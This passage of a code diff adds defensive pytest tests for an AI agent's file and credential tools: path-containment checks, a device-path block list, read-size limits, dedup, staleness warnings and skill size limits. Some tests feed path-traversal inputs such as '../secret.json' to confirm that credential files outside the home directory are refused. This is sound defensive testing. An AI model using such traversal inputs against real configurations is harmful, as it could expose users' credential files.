+# ---------------------------------------------------------------------------
+# Config-based credential files — same containment checks
+# ---------------------------------------------------------------------------
+
+class TestConfigPathTraversal:
+    """terminal.credential_files in config.yaml must also reject traversal."""
+
+    def _write_config(self, hermes_home: Path, cred_files: list):
+        import yaml
+        config_path = hermes_home / "config.yaml"
+        config_path.write_text(yaml.dump({"terminal": {"credential_files": cred_files}}))
+
+    def test_config_traversal_rejected(self, tmp_path, monkeypatch):
+        """'../secret' in config.yaml must not escape HERMES_HOME."""
+        hermes_home = tmp_path / ".hermes"
+        hermes_home.mkdir()
+        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
+
+        sensitive = tmp_path / "secret.json"
+        sensitive.write_text("{}")
+        self._write_config(hermes_home, ["../secret.json"])
+
+        mounts = get_credential_file_mounts()
+        host_paths = [m["host_path"] for m in mounts]
+        assert str(sensitive) not in host_paths
+        assert str(sensitive.resolve()) not in host_paths
+
+    def test_config_absolute_path_rejected(self, tmp_path, monkeypatch):
+        """Absolute paths in config.yaml must be rejected."""
+        hermes_home = tmp_path / ".hermes"
+        hermes_home.mkdir()
+        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
+
+        sensitive = tmp_path / "abs.json"
+        sensitive.write_text("{}")
+        self._write_config(hermes_home, [str(sensitive)])
+
+        mounts = get_credential_file_mounts()
+        assert mounts == []
+
+    def test_config_legitimate_file_works(self, tmp_path, monkeypatch):
+        """Normal files inside HERMES_HOME via config must still mount."""
+        hermes_home = tmp_path / ".hermes"
+        hermes_home.mkdir()
+        monkeypatch.setenv("HERMES_HOME", str(hermes_home))
+
+        (hermes_home / "oauth.json").write_text("{}")
+        self._write_config(hermes_home, ["oauth.json"])
+
+        mounts = get_credential_file_mounts()
+        assert len(mounts) == 1
+        assert "oauth.json" in mounts[0]["container_path"]
--- a/tests/tools/test_delegate.py
+++ b/tests/tools/test_delegate.py
@@ -593,7 +593,14 @@ class TestDelegationCredentialResolution(unittest.TestCase):
            "model": "qwen2.5-coder",
            "base_url": "http://localhost:1234/v1",
        }
-        with patch.dict(os.environ, {"OPENROUTER_API_KEY": "env-openrouter-key"}, clear=False):
+        with patch.dict(
+            os.environ,
+            {
+                "OPENROUTER_API_KEY": "env-openrouter-key",
+                "OPENAI_API_KEY": "",
+            },
+            clear=False,
+        ):
            with self.assertRaises(ValueError) as ctx:
                _resolve_delegation_credentials(cfg, parent)
        self.assertIn("OPENAI_API_KEY", str(ctx.exception))
--- a/tests/tools/test_file_read_guards.py
+++ b/tests/tools/test_file_read_guards.py
@@ -0,0 +1,378 @@
+#!/usr/bin/env python3
+"""
+Tests for read_file_tool safety guards: device-path blocking,
+character-count limits, file deduplication, and dedup reset on
+context compression.
+
+Run with:  python -m pytest tests/tools/test_file_read_guards.py -v
+"""
+
+import json
+import os
+import tempfile
+import time
+import unittest
+from unittest.mock import patch, MagicMock
+
+from tools.file_tools import (
+    read_file_tool,
+    clear_read_tracker,
+    reset_file_dedup,
+    _is_blocked_device,
+    _get_max_read_chars,
+    _DEFAULT_MAX_READ_CHARS,
+)
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+class _FakeReadResult:
+    """Minimal stand-in for FileOperations.read_file return value."""
+    def __init__(self, content="line1\nline2\n", total_lines=2, file_size=100):
+        self.content = content
+        self._total_lines = total_lines
+        self._file_size = file_size
+
+    def to_dict(self):
+        return {
+            "content": self.content,
+            "total_lines": self._total_lines,
+            "file_size": self._file_size,
+        }
+
+
+def _make_fake_ops(content="hello\n", total_lines=1, file_size=6):
+    fake = MagicMock()
+    fake.read_file = lambda path, offset=1, limit=500: _FakeReadResult(
+        content=content, total_lines=total_lines, file_size=file_size,
+    )
+    return fake
+
+
+# ---------------------------------------------------------------------------
+# Device path blocking
+# ---------------------------------------------------------------------------
+
+class TestDevicePathBlocking(unittest.TestCase):
+    """Paths like /dev/zero should be rejected before any I/O."""
+
+    def test_blocked_device_detection(self):
+        for dev in ("/dev/zero", "/dev/random", "/dev/urandom", "/dev/stdin",
+                     "/dev/tty", "/dev/console", "/dev/stdout", "/dev/stderr",
+                     "/dev/fd/0", "/dev/fd/1", "/dev/fd/2"):
+            self.assertTrue(_is_blocked_device(dev), f"{dev} should be blocked")
+
+    def test_safe_device_not_blocked(self):
+        self.assertFalse(_is_blocked_device("/dev/null"))
+        self.assertFalse(_is_blocked_device("/dev/sda1"))
+
+    def test_proc_fd_blocked(self):
+        self.assertTrue(_is_blocked_device("/proc/self/fd/0"))
+        self.assertTrue(_is_blocked_device("/proc/12345/fd/2"))
+
+    def test_proc_fd_other_not_blocked(self):
+        self.assertFalse(_is_blocked_device("/proc/self/fd/3"))
+        self.assertFalse(_is_blocked_device("/proc/self/maps"))
+
+    def test_normal_files_not_blocked(self):
+        self.assertFalse(_is_blocked_device("/tmp/test.py"))
+        self.assertFalse(_is_blocked_device("/home/user/.bashrc"))
+
+    def test_read_file_tool_rejects_device(self):
+        """read_file_tool returns an error without any file I/O."""
+        result = json.loads(read_file_tool("/dev/zero", task_id="dev_test"))
+        self.assertIn("error", result)
+        self.assertIn("device file", result["error"])
+
+
+# ---------------------------------------------------------------------------
+# Character-count limits
+# ---------------------------------------------------------------------------
+
+class TestCharacterCountGuard(unittest.TestCase):
+    """Large reads should be rejected with guidance to use offset/limit."""
+
+    def setUp(self):
+        clear_read_tracker()
+
+    def tearDown(self):
+        clear_read_tracker()
+
+    @patch("tools.file_tools._get_file_ops")
+    @patch("tools.file_tools._get_max_read_chars", return_value=_DEFAULT_MAX_READ_CHARS)
+    def test_oversized_read_rejected(self, _mock_limit, mock_ops):
+        """A read that returns >max chars is rejected."""
+        big_content = "x" * (_DEFAULT_MAX_READ_CHARS + 1)
+        mock_ops.return_value = _make_fake_ops(
+            content=big_content,
+            total_lines=5000,
+            file_size=len(big_content) + 100,  # bigger than content
+        )
+        result = json.loads(read_file_tool("/tmp/huge.txt", task_id="big"))
+        self.assertIn("error", result)
+        self.assertIn("safety limit", result["error"])
+        self.assertIn("offset and limit", result["error"])
+        self.assertIn("total_lines", result)
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_small_read_not_rejected(self, mock_ops):
+        """Normal-sized reads pass through fine."""
+        mock_ops.return_value = _make_fake_ops(content="short\n", file_size=6)
+        result = json.loads(read_file_tool("/tmp/small.txt", task_id="small"))
+        self.assertNotIn("error", result)
+        self.assertIn("content", result)
+
+    @patch("tools.file_tools._get_file_ops")
+    @patch("tools.file_tools._get_max_read_chars", return_value=_DEFAULT_MAX_READ_CHARS)
+    def test_content_under_limit_passes(self, _mock_limit, mock_ops):
+        """Content just under the limit should pass through fine."""
+        mock_ops.return_value = _make_fake_ops(
+            content="y" * (_DEFAULT_MAX_READ_CHARS - 1),
+            file_size=_DEFAULT_MAX_READ_CHARS - 1,
+        )
+        result = json.loads(read_file_tool("/tmp/justunder.txt", task_id="under"))
+        self.assertNotIn("error", result)
+        self.assertIn("content", result)
+
+
+# ---------------------------------------------------------------------------
+# File deduplication
+# ---------------------------------------------------------------------------
+
+class TestFileDedup(unittest.TestCase):
+    """Re-reading an unchanged file should return a lightweight stub."""
+
+    def setUp(self):
+        clear_read_tracker()
+        self._tmpdir = tempfile.mkdtemp()
+        self._tmpfile = os.path.join(self._tmpdir, "dedup_test.txt")
+        with open(self._tmpfile, "w") as f:
+            f.write("line one\nline two\n")
+
+    def tearDown(self):
+        clear_read_tracker()
+        try:
+            os.unlink(self._tmpfile)
+            os.rmdir(self._tmpdir)
+        except OSError:
+            pass
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_second_read_returns_dedup_stub(self, mock_ops):
+        """Second read of same file+range returns dedup stub."""
+        mock_ops.return_value = _make_fake_ops(
+            content="line one\nline two\n", file_size=20,
+        )
+        # First read — full content
+        r1 = json.loads(read_file_tool(self._tmpfile, task_id="dup"))
+        self.assertNotIn("dedup", r1)
+
+        # Second read — should get dedup stub
+        r2 = json.loads(read_file_tool(self._tmpfile, task_id="dup"))
+        self.assertTrue(r2.get("dedup"), "Second read should return dedup stub")
+        self.assertIn("unchanged", r2.get("content", ""))
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_modified_file_not_deduped(self, mock_ops):
+        """After the file is modified, dedup returns full content."""
+        mock_ops.return_value = _make_fake_ops(
+            content="line one\nline two\n", file_size=20,
+        )
+        read_file_tool(self._tmpfile, task_id="mod")
+
+        # Modify the file — ensure mtime changes
+        time.sleep(0.05)
+        with open(self._tmpfile, "w") as f:
+            f.write("changed content\n")
+
+        r2 = json.loads(read_file_tool(self._tmpfile, task_id="mod"))
+        self.assertNotEqual(r2.get("dedup"), True, "Modified file should not dedup")
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_different_range_not_deduped(self, mock_ops):
+        """Same file but different offset/limit should not dedup."""
+        mock_ops.return_value = _make_fake_ops(
+            content="line one\nline two\n", file_size=20,
+        )
+        read_file_tool(self._tmpfile, offset=1, limit=500, task_id="rng")
+
+        r2 = json.loads(read_file_tool(
+            self._tmpfile, offset=10, limit=500, task_id="rng",
+        ))
+        self.assertNotEqual(r2.get("dedup"), True)
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_different_task_not_deduped(self, mock_ops):
+        """Different task_ids have separate dedup caches."""
+        mock_ops.return_value = _make_fake_ops(
+            content="line one\nline two\n", file_size=20,
+        )
+        read_file_tool(self._tmpfile, task_id="task_a")
+
+        r2 = json.loads(read_file_tool(self._tmpfile, task_id="task_b"))
+        self.assertNotEqual(r2.get("dedup"), True)
+
+
+# ---------------------------------------------------------------------------
+# Dedup reset on compression
+# ---------------------------------------------------------------------------
+
+class TestDedupResetOnCompression(unittest.TestCase):
+    """reset_file_dedup should clear the dedup cache so post-compression
+    reads return full content."""
+
+    def setUp(self):
+        clear_read_tracker()
+        self._tmpdir = tempfile.mkdtemp()
+        self._tmpfile = os.path.join(self._tmpdir, "compress_test.txt")
+        with open(self._tmpfile, "w") as f:
+            f.write("original content\n")
+
+    def tearDown(self):
+        clear_read_tracker()
+        try:
+            os.unlink(self._tmpfile)
+            os.rmdir(self._tmpdir)
+        except OSError:
+            pass
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_reset_clears_dedup(self, mock_ops):
+        """After reset_file_dedup, the same read returns full content."""
+        mock_ops.return_value = _make_fake_ops(
+            content="original content\n", file_size=18,
+        )
+        # First read — populates dedup cache
+        read_file_tool(self._tmpfile, task_id="comp")
+
+        # Verify dedup works before reset
+        r_dedup = json.loads(read_file_tool(self._tmpfile, task_id="comp"))
+        self.assertTrue(r_dedup.get("dedup"), "Should dedup before reset")
+
+        # Simulate compression
+        reset_file_dedup("comp")
+
+        # Read again — should get full content
+        r_post = json.loads(read_file_tool(self._tmpfile, task_id="comp"))
+        self.assertNotEqual(r_post.get("dedup"), True,
+                            "Post-compression read should return full content")
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_reset_all_tasks(self, mock_ops):
+        """reset_file_dedup(None) clears all tasks."""
+        mock_ops.return_value = _make_fake_ops(
+            content="original content\n", file_size=18,
+        )
+        read_file_tool(self._tmpfile, task_id="t1")
+        read_file_tool(self._tmpfile, task_id="t2")
+
+        reset_file_dedup()  # no task_id — clear all
+
+        r1 = json.loads(read_file_tool(self._tmpfile, task_id="t1"))
+        r2 = json.loads(read_file_tool(self._tmpfile, task_id="t2"))
+        self.assertNotEqual(r1.get("dedup"), True)
+        self.assertNotEqual(r2.get("dedup"), True)
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_reset_preserves_loop_detection(self, mock_ops):
+        """reset_file_dedup does NOT affect the consecutive-read counter."""
+        mock_ops.return_value = _make_fake_ops(
+            content="original content\n", file_size=18,
+        )
+        # Build up consecutive count (read 1 and 2)
+        read_file_tool(self._tmpfile, task_id="loop")
+        # 2nd read is deduped — doesn't increment consecutive counter
+        read_file_tool(self._tmpfile, task_id="loop")
+
+        reset_file_dedup("loop")
+
+        # 3rd read — counter should still be at 2 from before reset
+        # (dedup was hit for read 2, but consecutive counter was 1 for that)
+        # After reset, this read goes through full path, incrementing to 2
+        r3 = json.loads(read_file_tool(self._tmpfile, task_id="loop"))
+        # Should NOT be blocked or warned — counter restarted since dedup
+        # intercepted reads before they reached the counter
+        self.assertNotIn("error", r3)
+
+
+# ---------------------------------------------------------------------------
+# Large-file hint
+# ---------------------------------------------------------------------------
+
+class TestLargeFileHint(unittest.TestCase):
+    """Large truncated files should include a hint about targeted reads."""
+
+    def setUp(self):
+        clear_read_tracker()
+
+    def tearDown(self):
+        clear_read_tracker()
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_large_truncated_file_gets_hint(self, mock_ops):
+        content = "line\n" * 400  # 2000 chars, small enough to pass char guard
+        fake = _make_fake_ops(content=content, total_lines=10000, file_size=600_000)
+        # Make to_dict return truncated=True
+        orig_read = fake.read_file
+        def patched_read(path, offset=1, limit=500):
+            r = orig_read(path, offset, limit)
+            orig_to_dict = r.to_dict
+            def new_to_dict():
+                d = orig_to_dict()
+                d["truncated"] = True
+                return d
+            r.to_dict = new_to_dict
+            return r
+        fake.read_file = patched_read
+        mock_ops.return_value = fake
+
+        result = json.loads(read_file_tool("/tmp/bigfile.log", task_id="hint"))
+        self.assertIn("_hint", result)
+        self.assertIn("section you need", result["_hint"])
+
+
+# ---------------------------------------------------------------------------
+# Config override
+# ---------------------------------------------------------------------------
+
+class TestConfigOverride(unittest.TestCase):
+    """file_read_max_chars in config.yaml should control the char guard."""
+
+    def setUp(self):
+        clear_read_tracker()
+        # Reset the cached value so each test gets a fresh lookup
+        import tools.file_tools as _ft
+        _ft._max_read_chars_cached = None
+
+    def tearDown(self):
+        clear_read_tracker()
+        import tools.file_tools as _ft
+        _ft._max_read_chars_cached = None
+
+    @patch("tools.file_tools._get_file_ops")
+    @patch("hermes_cli.config.load_config", return_value={"file_read_max_chars": 50})
+    def test_custom_config_lowers_limit(self, _mock_cfg, mock_ops):
+        """A config value of 50 should reject reads over 50 chars."""
+        mock_ops.return_value = _make_fake_ops(content="x" * 60, file_size=60)
+        result = json.loads(read_file_tool("/tmp/cfgtest.txt", task_id="cfg1"))
+        self.assertIn("error", result)
+        self.assertIn("safety limit", result["error"])
+        self.assertIn("50", result["error"])  # should show the configured limit
+
+    @patch("tools.file_tools._get_file_ops")
+    @patch("hermes_cli.config.load_config", return_value={"file_read_max_chars": 500_000})
+    def test_custom_config_raises_limit(self, _mock_cfg, mock_ops):
+        """A config value of 500K should allow reads up to 500K chars."""
+        # 200K chars would be rejected at the default 100K but passes at 500K
+        mock_ops.return_value = _make_fake_ops(
+            content="y" * 200_000, file_size=200_000,
+        )
+        result = json.loads(read_file_tool("/tmp/cfgtest2.txt", task_id="cfg2"))
+        self.assertNotIn("error", result)
+        self.assertIn("content", result)
+
+
+if __name__ == "__main__":
+    unittest.main()
--- a/tests/tools/test_file_staleness.py
+++ b/tests/tools/test_file_staleness.py
@@ -0,0 +1,241 @@
+#!/usr/bin/env python3
+"""
+Tests for file staleness detection in write_file and patch.
+
+When a file is modified externally between the agent's read and write,
+the write should include a warning so the agent can re-read and verify.
+
+Run with:  python -m pytest tests/tools/test_file_staleness.py -v
+"""
+
+import json
+import os
+import tempfile
+import time
+import unittest
+from unittest.mock import patch, MagicMock
+
+from tools.file_tools import (
+    read_file_tool,
+    write_file_tool,
+    patch_tool,
+    clear_read_tracker,
+    _check_file_staleness,
+)
+
+
+# ---------------------------------------------------------------------------
+# Helpers
+# ---------------------------------------------------------------------------
+
+class _FakeReadResult:
+    def __init__(self, content="line1\nline2\n", total_lines=2, file_size=100):
+        self.content = content
+        self._total_lines = total_lines
+        self._file_size = file_size
+
+    def to_dict(self):
+        return {
+            "content": self.content,
+            "total_lines": self._total_lines,
+            "file_size": self._file_size,
+        }
+
+
+class _FakeWriteResult:
+    def __init__(self):
+        self.bytes_written = 10
+
+    def to_dict(self):
+        return {"bytes_written": self.bytes_written}
+
+
+class _FakePatchResult:
+    def __init__(self):
+        self.success = True
+
+    def to_dict(self):
+        return {"success": True, "diff": "--- a\n+++ b\n@@ ...\n"}
+
+
+def _make_fake_ops(read_content="hello\n", file_size=6):
+    fake = MagicMock()
+    fake.read_file = lambda path, offset=1, limit=500: _FakeReadResult(
+        content=read_content, total_lines=1, file_size=file_size,
+    )
+    fake.write_file = lambda path, content: _FakeWriteResult()
+    fake.patch_replace = lambda path, old, new, replace_all=False: _FakePatchResult()
+    return fake
+
+
+# ---------------------------------------------------------------------------
+# Core staleness check
+# ---------------------------------------------------------------------------
+
+class TestStalenessCheck(unittest.TestCase):
+
+    def setUp(self):
+        clear_read_tracker()
+        self._tmpdir = tempfile.mkdtemp()
+        self._tmpfile = os.path.join(self._tmpdir, "stale_test.txt")
+        with open(self._tmpfile, "w") as f:
+            f.write("original content\n")
+
+    def tearDown(self):
+        clear_read_tracker()
+        try:
+            os.unlink(self._tmpfile)
+            os.rmdir(self._tmpdir)
+        except OSError:
+            pass
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_no_warning_when_file_unchanged(self, mock_ops):
+        """Read then write with no external modification — no warning."""
+        mock_ops.return_value = _make_fake_ops("original content\n", 18)
+        read_file_tool(self._tmpfile, task_id="t1")
+
+        result = json.loads(write_file_tool(self._tmpfile, "new content", task_id="t1"))
+        self.assertNotIn("_warning", result)
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_warning_when_file_modified_externally(self, mock_ops):
+        """Read, then external modify, then write — should warn."""
+        mock_ops.return_value = _make_fake_ops("original content\n", 18)
+        read_file_tool(self._tmpfile, task_id="t1")
+
+        # Simulate external modification
+        time.sleep(0.05)
+        with open(self._tmpfile, "w") as f:
+            f.write("someone else changed this\n")
+
+        result = json.loads(write_file_tool(self._tmpfile, "new content", task_id="t1"))
+        self.assertIn("_warning", result)
+        self.assertIn("modified since you last read", result["_warning"])
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_no_warning_when_file_never_read(self, mock_ops):
+        """Writing a file that was never read — no warning."""
+        mock_ops.return_value = _make_fake_ops()
+        result = json.loads(write_file_tool(self._tmpfile, "new content", task_id="t2"))
+        self.assertNotIn("_warning", result)
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_no_warning_for_new_file(self, mock_ops):
+        """Creating a new file — no warning."""
+        mock_ops.return_value = _make_fake_ops()
+        new_path = os.path.join(self._tmpdir, "brand_new.txt")
+        result = json.loads(write_file_tool(new_path, "content", task_id="t3"))
+        self.assertNotIn("_warning", result)
+        try:
+            os.unlink(new_path)
+        except OSError:
+            pass
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_different_task_isolated(self, mock_ops):
+        """Task A reads, file changes, Task B writes — no warning for B."""
+        mock_ops.return_value = _make_fake_ops("original content\n", 18)
+        read_file_tool(self._tmpfile, task_id="task_a")
+
+        time.sleep(0.05)
+        with open(self._tmpfile, "w") as f:
+            f.write("changed\n")
+
+        result = json.loads(write_file_tool(self._tmpfile, "new", task_id="task_b"))
+        self.assertNotIn("_warning", result)
+
+
+# ---------------------------------------------------------------------------
+# Staleness in patch
+# ---------------------------------------------------------------------------
+
+class TestPatchStaleness(unittest.TestCase):
+
+    def setUp(self):
+        clear_read_tracker()
+        self._tmpdir = tempfile.mkdtemp()
+        self._tmpfile = os.path.join(self._tmpdir, "patch_test.txt")
+        with open(self._tmpfile, "w") as f:
+            f.write("original line\n")
+
+    def tearDown(self):
+        clear_read_tracker()
+        try:
+            os.unlink(self._tmpfile)
+            os.rmdir(self._tmpdir)
+        except OSError:
+            pass
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_patch_warns_on_stale_file(self, mock_ops):
+        """Patch should warn if the target file changed since last read."""
+        mock_ops.return_value = _make_fake_ops("original line\n", 15)
+        read_file_tool(self._tmpfile, task_id="p1")
+
+        time.sleep(0.05)
+        with open(self._tmpfile, "w") as f:
+            f.write("externally modified\n")
+
+        result = json.loads(patch_tool(
+            mode="replace", path=self._tmpfile,
+            old_string="original", new_string="patched",
+            task_id="p1",
+        ))
+        self.assertIn("_warning", result)
+        self.assertIn("modified since you last read", result["_warning"])
+
+    @patch("tools.file_tools._get_file_ops")
+    def test_patch_no_warning_when_fresh(self, mock_ops):
+        """Patch with no external changes — no warning."""
+        mock_ops.return_value = _make_fake_ops("original line\n", 15)
+        read_file_tool(self._tmpfile, task_id="p2")
+
+        result = json.loads(patch_tool(
+            mode="replace", path=self._tmpfile,
+            old_string="original", new_string="patched",
+            task_id="p2",
+        ))
+        self.assertNotIn("_warning", result)
+
+
+# ---------------------------------------------------------------------------
+# Unit test for the helper
+# ---------------------------------------------------------------------------
+
+class TestCheckFileStalenessHelper(unittest.TestCase):
+
+    def setUp(self):
+        clear_read_tracker()
+
+    def tearDown(self):
+        clear_read_tracker()
+
+    def test_returns_none_for_unknown_task(self):
+        self.assertIsNone(_check_file_staleness("/tmp/x.py", "nonexistent"))
+
+    def test_returns_none_for_unread_file(self):
+        # Populate tracker with a different file
+        from tools.file_tools import _read_tracker, _read_tracker_lock
+        with _read_tracker_lock:
+            _read_tracker["t1"] = {
+                "last_key": None, "consecutive": 0,
+                "read_history": set(), "dedup": {},
+                "read_timestamps": {"/tmp/other.py": 12345.0},
+            }
+        self.assertIsNone(_check_file_staleness("/tmp/x.py", "t1"))
+
+    def test_returns_none_when_stat_fails(self):
+        from tools.file_tools import _read_tracker, _read_tracker_lock
+        with _read_tracker_lock:
+            _read_tracker["t1"] = {
+                "last_key": None, "consecutive": 0,
+                "read_history": set(), "dedup": {},
+                "read_timestamps": {"/nonexistent/path": 99999.0},
+            }
+        # File doesn't exist → stat fails → returns None (let write handle it)
+        self.assertIsNone(_check_file_staleness("/nonexistent/path", "t1"))
+
+
+if __name__ == "__main__":
+    unittest.main()
--- a/tests/tools/test_skill_improvements.py
+++ b/tests/tools/test_skill_improvements.py
@@ -0,0 +1,174 @@
+"""Tests for skill fuzzy patching via tools.fuzzy_match."""
+
+import json
+import os
+from pathlib import Path
+from unittest.mock import patch
+
+import pytest
+
+from tools.skill_manager_tool import (
+    _create_skill,
+    _patch_skill,
+    _write_file,
+    skill_manage,
+)
+
+
+SKILL_CONTENT = """\
+---
+name: test-skill
+description: A test skill for unit testing.
+---
+
+# Test Skill
+
+Step 1: Do the thing.
+Step 2: Do another thing.
+Step 3: Final step.
+"""
+
+
+# ---------------------------------------------------------------------------
+# Fuzzy patching
+# ---------------------------------------------------------------------------
+
+
+class TestFuzzyPatchSkill:
+    @pytest.fixture(autouse=True)
+    def setup_skills(self, tmp_path, monkeypatch):
+        skills_dir = tmp_path / "skills"
+        skills_dir.mkdir()
+        monkeypatch.setattr("tools.skill_manager_tool.SKILLS_DIR", skills_dir)
+        monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+        self.skills_dir = skills_dir
+
+    def test_exact_match_still_works(self):
+        _create_skill("test-skill", SKILL_CONTENT)
+        result = _patch_skill("test-skill", "Step 1: Do the thing.", "Step 1: Done!")
+        assert result["success"] is True
+        content = (self.skills_dir / "test-skill" / "SKILL.md").read_text()
+        assert "Step 1: Done!" in content
+
+    def test_whitespace_trimmed_match(self):
+        """Patch with extra leading whitespace should still find the target."""
+        skill = """\
+---
+name: ws-skill
+description: Whitespace test
+---
+
+# Commands
+
+    def hello():
+        print("hi")
+"""
+        _create_skill("ws-skill", skill)
+        # Agent sends patch with no leading whitespace (common LLM behaviour)
+        result = _patch_skill("ws-skill", "def hello():\n    print(\"hi\")", "def hello():\n    print(\"hello world\")")
+        assert result["success"] is True
+        content = (self.skills_dir / "ws-skill" / "SKILL.md").read_text()
+        assert 'print("hello world")' in content
+
+    def test_indentation_flexible_match(self):
+        """Patch where only indentation differs should succeed."""
+        skill = """\
+---
+name: indent-skill
+description: Indentation test
+---
+
+# Steps
+
+  1. First step
+  2. Second step
+  3. Third step
+"""
+        _create_skill("indent-skill", skill)
+        # Agent sends with different indentation
+        result = _patch_skill(
+            "indent-skill",
+            "1. First step\n2. Second step",
+            "1. Updated first\n2. Updated second"
+        )
+        assert result["success"] is True
+        content = (self.skills_dir / "indent-skill" / "SKILL.md").read_text()
+        assert "Updated first" in content
+
+    def test_multiple_matches_blocked_without_replace_all(self):
+        """Multiple fuzzy matches should return an error without replace_all."""
+        skill = """\
+---
+name: dup-skill
+description: Duplicate test
+---
+
+# Steps
+
+word word word
+"""
+        _create_skill("dup-skill", skill)
+        result = _patch_skill("dup-skill", "word", "replaced")
+        assert result["success"] is False
+        assert "match" in result["error"].lower()
+
+    def test_replace_all_with_fuzzy(self):
+        skill = """\
+---
+name: dup-skill
+description: Duplicate test
+---
+
+# Steps
+
+word word word
+"""
+        _create_skill("dup-skill", skill)
+        result = _patch_skill("dup-skill", "word", "replaced", replace_all=True)
+        assert result["success"] is True
+        content = (self.skills_dir / "dup-skill" / "SKILL.md").read_text()
+        assert "word" not in content
+        assert "replaced" in content
+
+    def test_no_match_returns_preview(self):
+        _create_skill("test-skill", SKILL_CONTENT)
+        result = _patch_skill("test-skill", "this does not exist anywhere", "replacement")
+        assert result["success"] is False
+        assert "file_preview" in result
+
+    def test_fuzzy_patch_on_supporting_file(self):
+        """Fuzzy matching should also work on supporting files."""
+        _create_skill("test-skill", SKILL_CONTENT)
+        ref_content = "    function hello() {\n        console.log('hi');\n    }"
+        _write_file("test-skill", "references/code.js", ref_content)
+        # Patch with stripped indentation
+        result = _patch_skill(
+            "test-skill",
+            "function hello() {\nconsole.log('hi');\n}",
+            "function hello() {\nconsole.log('hello world');\n}",
+            file_path="references/code.js"
+        )
+        assert result["success"] is True
+        content = (self.skills_dir / "test-skill" / "references" / "code.js").read_text()
+        assert "hello world" in content
+
+    def test_patch_preserves_frontmatter_validation(self):
+        """Fuzzy matching should still run frontmatter validation on SKILL.md."""
+        _create_skill("test-skill", SKILL_CONTENT)
+        # Try to destroy the frontmatter via patch
+        result = _patch_skill("test-skill", "---\nname: test-skill", "BROKEN")
+        assert result["success"] is False
+        assert "structure" in result["error"].lower() or "frontmatter" in result["error"].lower()
+
+    def test_skill_manage_patch_uses_fuzzy(self):
+        """The dispatcher should route to the fuzzy-matching patch."""
+        _create_skill("test-skill", SKILL_CONTENT)
+        raw = skill_manage(
+            action="patch",
+            name="test-skill",
+            old_string="  Step 1: Do the thing.",  # extra leading space
+            new_string="Step 1: Updated.",
+        )
+        result = json.loads(raw)
+        # Should succeed via line-trimmed or indentation-flexible matching
+        assert result["success"] is True
--- a/tests/tools/test_skill_manager_tool.py
+++ b/tests/tools/test_skill_manager_tool.py
@@ -271,7 +271,7 @@ class TestPatchSkill:
            _create_skill("my-skill", VALID_SKILL_CONTENT)
            result = _patch_skill("my-skill", "this text does not exist", "replacement")
        assert result["success"] is False
-        assert "not found" in result["error"]
+        assert "not found" in result["error"].lower() or "could not find" in result["error"].lower()

    def test_patch_ambiguous_match_rejected(self, tmp_path):
        content = """\
@@ -288,7 +288,7 @@ word word
            _create_skill("my-skill", content)
            result = _patch_skill("my-skill", "word", "replaced")
        assert result["success"] is False
-        assert "matched" in result["error"]
+        assert "match" in result["error"].lower()

    def test_patch_replace_all(self, tmp_path):
        content = """\
--- a/tests/tools/test_skill_size_limits.py
+++ b/tests/tools/test_skill_size_limits.py
@@ -0,0 +1,215 @@
+"""Tests for skill content size limits.
+
+Agent writes (create/edit/patch/write_file) are constrained to
+MAX_SKILL_CONTENT_CHARS (100k) and MAX_SKILL_FILE_BYTES (1 MiB).
+Hand-placed and hub-installed skills have no hard limit.
+"""
+
+import json
+import os
+from pathlib import Path
+from unittest.mock import patch
+
+import pytest
+
+from tools.skill_manager_tool import (
+    MAX_SKILL_CONTENT_CHARS,
+    MAX_SKILL_FILE_BYTES,
+    _validate_content_size,
+    skill_manage,
+)
+
+
+@pytest.fixture(autouse=True)
+def isolate_skills(tmp_path, monkeypatch):
+    """Redirect SKILLS_DIR to a temp directory."""
+    skills_dir = tmp_path / "skills"
+    skills_dir.mkdir()
+    monkeypatch.setattr("tools.skill_manager_tool.SKILLS_DIR", skills_dir)
+    monkeypatch.setattr("tools.skills_tool.SKILLS_DIR", skills_dir)
+    monkeypatch.setenv("HERMES_HOME", str(tmp_path))
+    return skills_dir
+
+
+def _make_skill_content(body_chars: int) -> str:
+    """Generate valid SKILL.md content with a body of the given character count."""
+    frontmatter = (
+        "---\n"
+        "name: test-skill\n"
+        "description: A test skill\n"
+        "---\n"
+    )
+    body = "# Test Skill\n\n" + ("x" * max(0, body_chars - 15))
+    return frontmatter + body
+
+
+class TestValidateContentSize:
+    """Unit tests for _validate_content_size."""
+
+    def test_within_limit(self):
+        assert _validate_content_size("a" * 1000) is None
+
+    def test_at_limit(self):
+        assert _validate_content_size("a" * MAX_SKILL_CONTENT_CHARS) is None
+
+    def test_over_limit(self):
+        err = _validate_content_size("a" * (MAX_SKILL_CONTENT_CHARS + 1))
+        assert err is not None
+        assert "100,001" in err
+        assert "100,000" in err
+
+    def test_custom_label(self):
+        err = _validate_content_size("a" * (MAX_SKILL_CONTENT_CHARS + 1), label="references/api.md")
+        assert "references/api.md" in err
+
+
+class TestCreateSkillSizeLimit:
+    """create action rejects oversized content."""
+
+    def test_create_within_limit(self, isolate_skills):
+        content = _make_skill_content(5000)
+        result = json.loads(skill_manage(action="create", name="small-skill", content=content))
+        assert result["success"] is True
+
+    def test_create_over_limit(self, isolate_skills):
+        content = _make_skill_content(MAX_SKILL_CONTENT_CHARS + 100)
+        result = json.loads(skill_manage(action="create", name="huge-skill", content=content))
+        assert result["success"] is False
+        assert "100,000" in result["error"]
+
+    def test_create_at_limit(self, isolate_skills):
+        # Content at exactly the limit should succeed
+        frontmatter = "---\nname: edge-skill\ndescription: Edge case\n---\n# Edge\n\n"
+        body_budget = MAX_SKILL_CONTENT_CHARS - len(frontmatter)
